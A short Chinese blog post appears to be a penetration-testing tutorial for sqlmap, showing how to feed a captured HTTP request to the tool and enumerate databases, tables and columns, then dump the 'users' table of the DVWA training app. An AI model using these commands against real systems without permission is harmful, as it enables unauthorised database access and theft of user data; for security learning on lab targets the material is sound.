sqlmap

2019-03-08  本文已影响0人  ESE_

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了

windows使用

Windows10
Fiddler2
sqlmap
python3

1、利用Burpsuite或者Fiddler抓取数据包,命名为1.txt
2、将数据包放在sqlmap的文件夹下,运行python sqlmap.py -r 1.txt.某个参数python sqlmap.py -r 1.txt -p username

linux使用步骤

1、将抓取的数据包保存为文件[如:11]


url

2、运行sqlmap跑文件--->sqlmap -r 11 --dbs

sqlmap
注:sqlmap.py -r 1.txt -p uname[-p:指定注入参数]

3、列举数据库表中的表--->sqlmap -r 11 --tables -D dvwa

tables

4、列举数据库表中的字段--->sqlmap -r 11 --columns -T users -D dvwa

columns

5、获取整个表的数据--->sqlmap -r 11 --dump -T users -D dvwa

dump

6、使用手册

上一篇 下一篇

猜你喜欢

热点阅读